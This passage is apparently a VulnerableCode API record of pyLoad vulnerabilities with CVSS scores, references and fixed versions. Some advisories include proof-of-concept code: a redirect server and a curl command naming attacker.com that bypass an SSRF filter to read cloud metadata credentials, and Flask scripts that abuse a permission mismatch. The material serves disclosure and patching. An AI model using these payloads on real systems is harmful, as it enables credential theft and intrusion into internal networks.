"GHSA-cjjf-27cc-pvmv", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-cjjf-27cc-pvmv" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-cjjf-27cc-pvmv", "reference_id": "GHSA-cjjf-27cc-pvmv", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-10-10T14:29:28Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-cjjf-27cc-pvmv" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/48575?format=api", "purl": "pkg:pypi/pyload-ng@0.5.0b3.dev91", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1k5h-nhcv-cke9" }, { "vulnerability": "VCID-4fna-mzsg-w7d5" }, { "vulnerability": "VCID-6ujx-ntw5-s7dy" }, { "vulnerability": "VCID-73d4-um61-k7ht" }, { "vulnerability": "VCID-9rb6-kh78-sbdf" }, { "vulnerability": "VCID-9u2h-q8gu-t7h4" }, { "vulnerability": "VCID-c4n8-pnbr-buce" }, { "vulnerability": "VCID-h66k-vm3m-c3b6" }, { "vulnerability": "VCID-hkus-pqz4-uyb2" }, { "vulnerability": "VCID-hsc6-6qgc-q3eg" }, { "vulnerability": "VCID-hzu2-r32u-q7c7" }, { "vulnerability": "VCID-jxej-fugb-3ydh" }, { "vulnerability": "VCID-ng6u-saxg-dbf9" }, { "vulnerability": "VCID-p22h-1rtx-bkcy" }, { "vulnerability": "VCID-qg7b-ayq5-8bax" }, { "vulnerability": "VCID-qmbx-7s8b-4khw" }, { "vulnerability": "VCID-ut9v-xcjn-ukb1" }, { "vulnerability": "VCID-vzzm-8en6-fydc" }, { "vulnerability": "VCID-x15r-v69w-yuaj" }, { "vulnerability": "VCID-x1ek-3cgq-skh9" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev91" } ], "aliases": [ "CVE-2025-61773", "GHSA-cjjf-27cc-pvmv" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-f95r-tk7k-gufe" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/57739?format=api", "vulnerability_id": "VCID-f9wx-gf1u-7bgc", "summary": "Pyload log Injection via API /json/add_package in add_name parameter\nA log injection vulnerability was identified in `pyload` in API `/json/add_package`. This vulnerability allows user with add packages permission to inject arbitrary messages into the logs gathered by `pyload`.", "references": [ { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/commit/ddf8a48b83aaf36052b08732c424cffcf9ffccca", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload/commit/ddf8a48b83aaf36052b08732c424cffcf9ffccca" }, { "reference_url": "https://github.com/advisories/GHSA-3wwm-hjv7-23r3", "reference_id": "GHSA-3wwm-hjv7-23r3", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-3wwm-hjv7-23r3" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-3wwm-hjv7-23r3", "reference_id": "GHSA-3wwm-hjv7-23r3", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-3wwm-hjv7-23r3" } ], "fixed_packages": [], "aliases": [ "GHSA-3wwm-hjv7-23r3" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-f9wx-gf1u-7bgc" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/37328?format=api", "vulnerability_id": "VCID-h66k-vm3m-c3b6", "summary": "pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev100, the set_config_value() API method (@permission(Perms.SETTINGS)) in src/pyload/core/api/__init__.py gates security-sensitive options behind a hand-maintained allowlist ADMIN_ONLY_CORE_OPTIONS. The allowlist contains (\"proxy\", \"username\") and (\"proxy\", \"password\") — which protect the proxy credentials — but it does not include (\"proxy\", \"enabled\"), (\"proxy\", \"host\"), (\"proxy\", \"port\"), or (\"proxy\", \"type\"). Any authenticated user with the non-admin SETTINGS permission can enable proxying and point pyload at any host they control. From that point, every outbound download, captcha fetch, update check, and plugin HTTP call is transparently routed through the attacker. This is a direct continuation of the fix family CVE-2026-33509 / CVE-2026-35463 / CVE-2026-35464 / CVE-2026-35586, each of which patched a different missed option in the same allowlist. This vulnerability is fixed in 0.5.0b3.dev100.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42313", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00016", "scoring_system": "epss", "scoring_elements": "0.0408", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42313" }, { "reference_url": "https://github.com/advisories/GHSA-4744-96p5-mp2j", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-4744-96p5-mp2j" }, { "reference_url": "https://github.com/advisories/GHSA-ppvx-rwh9-7rj7", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-ppvx-rwh9-7rj7" }, { "reference_url": "https://github.com/advisories/GHSA-r7mc-x6x7-cqxx", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-r7mc-x6x7-cqxx" }, { "reference_url": "https://github.com/advisories/GHSA-w48f-wwwf-f5fr", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-w48f-wwwf-f5fr" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-pg67-9wjv-mr85", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-12T13:50:29Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-pg67-9wjv-mr85" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42313", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42313" }, { "reference_url": "https://github.com/advisories/GHSA-pg67-9wjv-mr85", "reference_id": "GHSA-pg67-9wjv-mr85", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-pg67-9wjv-mr85" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/50306?format=api", "purl": "pkg:pypi/pyload-ng@0.5.0b3.dev100", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev100" } ], "aliases": [ "CVE-2026-42313", "GHSA-pg67-9wjv-mr85", "PYSEC-2026-127" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-h66k-vm3m-c3b6" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/88971?format=api", "vulnerability_id": "VCID-hkus-pqz4-uyb2", "summary": "pyLoad: SSRF filter bypass via HTTP redirect in BaseDownloader (Incomplete fix for CVE-2026-33992)\n## Summary\n\nThe fix for CVE-2026-33992 (GHSA-m74m-f7cr-432x) added IP validation to `BaseDownloader.download()` that checks the hostname of the initial download URL. However, pycurl is configured with `FOLLOWLOCATION=1` and `MAXREDIRS=10`, causing it to automatically follow HTTP redirects. Redirect targets are never validated against the SSRF filter.\n\nAn authenticated user with ADD permission can bypass the SSRF fix by submitting a URL that redirects to an internal address.\n\n## Root Cause\n\nThe SSRF check at `src/pyload/plugins/base/downloader.py:335-341` validates only the initial URL:\n\n dl_hostname = urllib.parse.urlparse(dl_url).hostname\n if is_ip_address(dl_hostname) and not is_global_address(dl_hostname):\n self.fail(...)\n else:\n for ip in host_to_ip(dl_hostname):\n if not is_global_address(ip):\n self.fail(...)\n\nAfter the check passes, `_download()` is called. pycurl is configured at `src/pyload/core/network/http/http_request.py:114-115` to follow redirects:\n\n self.c.setopt(pycurl.FOLLOWLOCATION, 1)\n self.c.setopt(pycurl.MAXREDIRS, 10)\n\nNo `CURLOPT_REDIR_PROTOCOLS` restriction is set anywhere in HTTPRequest. Redirect targets bypass the SSRF filter entirely.\n\n## PoC\n\nRedirect server (attacker-controlled):\n\n from http.server import HTTPServer, BaseHTTPRequestHandler\n\n class RedirectHandler(BaseHTTPRequestHandler):\n def do_GET(self):\n self.send_response(302)\n self.send_header(\"Location\", \"http://169.254.169.254/metadata/v1.json\")\n self.end_headers()\n\n HTTPServer((\"0.0.0.0\", 8888), RedirectHandler).serve_forever()\n\nSubmit to pyload (requires ADD permission):\n\n curl -b cookies.txt -X POST 'http://target:8000/json/add_package' \\\n -d 'add_name=ssrf-test&add_dest=1&add_links=http://attacker.com:8888/redirect'\n\nThe SSRF check resolves `attacker.com` to a public IP and passes. pycurl follows the 302 redirect to `http://169.254.169.254/metadata/v1.json` without validation. Cloud metadata is downloaded and saved to the storage folder.\n\n## Impact\n\nAn authenticated user with ADD permission can access:\n\n- Cloud metadata endpoints (169.254.169.254) for AWS, GCP, DigitalOcean, Azure — including IAM credentials and instance identity\n- Internal network services (10.x, 172.16.x, 192.168.x)\n- Localhost services (127.0.0.1)\n\nThis is the same impact as CVE-2026-33992 (rated Critical), achieved through a single redirect hop. The severity is reduced from Critical to High because authentication with ADD permission is now required.\n\n## Suggested Fix\n\nDisable automatic redirect following and validate each redirect target:\n\n # In HTTPRequest.__init__():\n self.c.setopt(pycurl.FOLLOWLOCATION, 0)\n\nThen implement manual redirect following in the download logic with SSRF validation at each hop. Alternatively, restrict redirect protocols:\n\n self.c.setopt(pycurl.REDIR_PROTOCOLS, pycurl.PROTO_HTTP | pycurl.PROTO_HTTPS)\n\nAnd add a pycurl callback to validate redirect destination IPs before following.\n\n## Resources\n\n- CVE-2026-33992 / GHSA-m74m-f7cr-432x: Original SSRF (Critical, unauthenticated). This bypass requires ADD permission.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35459", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00043", "scoring_system": "epss", "scoring_elements": "0.13369", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35459" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/commit/33c55da084320430edfd941b60e3da0eb1be9443", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-07T19:26:41Z/" } ], "url": "https://github.com/pyload/pyload/commit/33c55da084320430edfd941b60e3da0eb1be9443" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-7gvf-3w72-p2pg", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-07T19:26:41Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-7gvf-3w72-p2pg" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33992", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33992" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35459", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35459" }, { "reference_url": "https://github.com/advisories/GHSA-7gvf-3w72-p2pg", "reference_id": "GHSA-7gvf-3w72-p2pg", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-7gvf-3w72-p2pg" } ], "fixed_packages": [], "aliases": [ "CVE-2026-35459", "GHSA-7gvf-3w72-p2pg" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-hkus-pqz4-uyb2" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/37253?format=api", "vulnerability_id": "VCID-hsc6-6qgc-q3eg", "summary": "pyLoad is a free and open-source download manager written in Python. Prior to version 0.5.0b3.dev97, a Host Header Spoofing vulnerability in the @local_check decorator allows unauthenticated external attackers to bypass local-only restrictions. This grants access to the Click'N'Load API endpoints, enabling attackers to remotely queue arbitrary downloads, leading to Server-Side Request Forgery (SSRF) and Denial of Service (DoS). This issue has been patched in version 0.5.0b3.dev97.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33314", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.0158", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33314" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-q485-cg9q-xq2r", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-26T19:33:35Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-q485-cg9q-xq2r" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33314", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33314" }, { "reference_url": "https://github.com/advisories/GHSA-q485-cg9q-xq2r", "reference_id": "GHSA-q485-cg9q-xq2r", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-q485-cg9q-xq2r" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/48581?format=api", "purl": "pkg:pypi/pyload-ng@0.5.0b3.dev97", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1k5h-nhcv-cke9" }, { "vulnerability": "VCID-9u2h-q8gu-t7h4" }, { "vulnerability": "VCID-c4n8-pnbr-buce" }, { "vulnerability": "VCID-h66k-vm3m-c3b6" }, { "vulnerability": "VCID-hzu2-r32u-q7c7" }, { "vulnerability": "VCID-jxej-fugb-3ydh" }, { "vulnerability": "VCID-p22h-1rtx-bkcy" }, { "vulnerability": "VCID-qg7b-ayq5-8bax" }, { "vulnerability": "VCID-qmbx-7s8b-4khw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev97" } ], "aliases": [ "CVE-2026-33314", "GHSA-q485-cg9q-xq2r", "PYSEC-2026-122" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-hsc6-6qgc-q3eg" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/55787?format=api", "vulnerability_id": "VCID-hva8-kb62-rkax", "summary": "Duplicate\nThis advisory duplicates another.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-39205", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.83924", "scoring_system": "epss", "scoring_elements": "0.99313", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-39205" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2024-10-30T20:48:52Z/" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/Marven11/CVE-2024-28397-js2py-Sandbox-Escape", "reference_id": "CVE-2024-28397-JS2PY-SANDBOX-ESCAPE", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/Marven11/CVE-2024-28397-js2py-Sandbox-Escape" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39205", "reference_id": "CVE-2024-39205", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39205" }, { "reference_url": "https://github.com/advisories/GHSA-h95x-26f3-88hr", "reference_id": "GHSA-h95x-26f3-88hr", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-h95x-26f3-88hr" }, { "reference_url": "https://github.com/advisories/GHSA-r9pp-r4xf-597r", "reference_id": "GHSA-r9pp-r4xf-597r", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-r9pp-r4xf-597r" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-r9pp-r4xf-597r", "reference_id": "GHSA-r9pp-r4xf-597r", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2024-10-30T20:48:52Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-r9pp-r4xf-597r" } ], "fixed_packages": [], "aliases": [ "CVE-2024-39205", "GHSA-r9pp-r4xf-597r" ], "risk_score": 10.0, "exploitability": "2.0", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-hva8-kb62-rkax" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89732?format=api", "vulnerability_id": "VCID-hzu2-r32u-q7c7", "summary": "pyload-ng has a WebUI JSON permission mismatch that lets ADD/DELETE users invoke MODIFY-only actions\n### Summary\nSeveral WebUI JSON endpoints enforce weaker permissions than the core API methods they invoke. This allows authenticated low-privileged users to execute `MODIFY` operations that should be denied by pyLoad's own permission model.\n\nConfirmed mismatches:\n- `ADD` user can reorder packages/files (`order_package`, `order_file`) via `/json/package_order` and `/json/link_order`\n- `DELETE` user can abort downloads (`stop_downloads`) via `/json/abort_link`\n\n### Details\npyLoad defines granular permissions in core API:\n- `order_package` requires `Perms.MODIFY` (`src/pyload/core/api/__init__.py:1125`)\n- `order_file` requires `Perms.MODIFY` (`src/pyload/core/api/__init__.py:1137`)\n- `stop_downloads` requires `Perms.MODIFY` (`src/pyload/core/api/__init__.py:1046`)\n\nBut WebUI JSON routes use weaker checks:\n- `/json/package_order` uses `@login_required(\"ADD\")` then calls `api.order_package(...)` (`src/pyload/webui/app/blueprints/json_blueprint.py:109-117`)\n- `/json/link_order` uses `@login_required(\"ADD\")` then calls `api.order_file(...)` (`src/pyload/webui/app/blueprints/json_blueprint.py:137-145`)\n- `/json/abort_link` uses `@login_required(\"DELETE\")` then calls `api.stop_downloads(...)` (`src/pyload/webui/app/blueprints/json_blueprint.py:123-131`)\n\nWhy this is likely unintended (not just convenience):\n- The same JSON blueprint correctly protects other edit actions with `MODIFY`:\n - `/json/move_package` -> `@login_required(\"MODIFY\")` (`json_blueprint.py:188-196`)\n - `/json/edit_package` -> `@login_required(\"MODIFY\")` (`json_blueprint.py:202-217`)\n- The project UI exposes granular per-user permission assignment (`settings.html:184-190`), implying these boundaries are intended security controls.\n\n### PoC\nEnvironment:\n- Repository version: `0.5.0b3` (`VERSION` file)\n- Commit tested: `ddc53b3d7`\n\nPoC A (ADD-only user invokes MODIFY-only reorder):\n```python\nimport os\nimport sys\nfrom types import SimpleNamespace\n\nsys.path.insert(0, os.path.abspath('src'))\n\nfrom flask import Flask\nfrom pyload.core.api import Api, Perms, Role\nfrom pyload.webui.app.blueprints import json_blueprint\n\nclass FakeApi:\n def __init__(self):\n self.calls = []\n\n def user_exists(self, username):\n return username == 'attacker'\n\n def order_package(self, pack_id, pos):\n self.calls.append(('order_package', int(pack_id), int(pos)))\n\n def order_file(self, file_id, pos):\n self.calls.append(('order_file', int(file_id), int(pos)))\n\napi = Api(SimpleNamespace(_=lambda x: x))\nctx = {'role': Role.USER, 'permission': Perms.ADD}\nprint('API auth (ADD-only) order_package:', api.is_authorized('order_package', ctx))\nprint('API auth (ADD-only) order_file:', api.is_authorized('order_file', ctx))\n\napp = Flask(__name__)\napp.secret_key = 'k'\napp.config['TESTING'] = True\napp.config['WTF_CSRF_ENABLED'] = False\nf = FakeApi()\napp.config['PYLOAD_API'] = f\napp.register_blueprint(json_blueprint.bp)\n\nwith app.test_client() as c:\n with c.session_transaction() as s:\n s['authenticated'] = True\n s['name'] = 'attacker'\n s['role'] = int(Role.USER)\n s['perms'] = int(Perms.ADD)\n\n r1 = c.post('/json/package_order', json={'pack_id': 5, 'pos': 0})\n r2 = c.post('/json/link_order', json={'file_id': 77, 'pos': 1})\n\nprint('HTTP /json/package_order:', r1.status_code, r1.get_data(as_text=True).strip())\nprint('HTTP /json/link_order:', r2.status_code, r2.get_data(as_text=True).strip())\nprint('calls:', f.calls)\n```\n\nObserved output:\n```text\nAPI auth (ADD-only) order_package: False\nAPI auth (ADD-only) order_file: False\nHTTP /json/package_order: 200 {\"response\":\"success\"}\nHTTP /json/link_order: 200 {\"response\":\"success\"}\ncalls: [('order_package', 5, 0), ('order_file', 77, 1)]\n```\n\nPoC B (DELETE-only user invokes MODIFY-only stop_downloads):\n```python\nimport os\nimport sys\nfrom types import SimpleNamespace\n\nsys.path.insert(0, os.path.abspath('src'))\n\nfrom flask import Flask\nfrom pyload.core.api import Api, Perms, Role\nfrom pyload.webui.app.blueprints import json_blueprint\n\nclass FakeApi:\n def __init__(self):\n self.calls = []\n\n def user_exists(self, username):\n return username == 'u'\n\n def stop_downloads(self, ids):\n self.calls.append(('stop_downloads', ids))\n\napi = Api(SimpleNamespace(_=lambda x: x))\nctx = {'role': Role.USER, 'permission': Perms.DELETE}\nprint('API auth (DELETE-only) stop_downloads:', api.is_authorized('stop_downloads', ctx))\n\napp = Flask(__name__)\napp.secret_key = 'k'\napp.config['TESTING'] = True\napp.config['WTF_CSRF_ENABLED'] = False\nf = FakeApi()\napp.config['PYLOAD_API'] = f\napp.register_blueprint(json_blueprint.bp)\n\nwith app.test_client() as c:\n with c.session_transaction() as s:\n s['authenticated'] = True\n s['name'] = 'u'\n 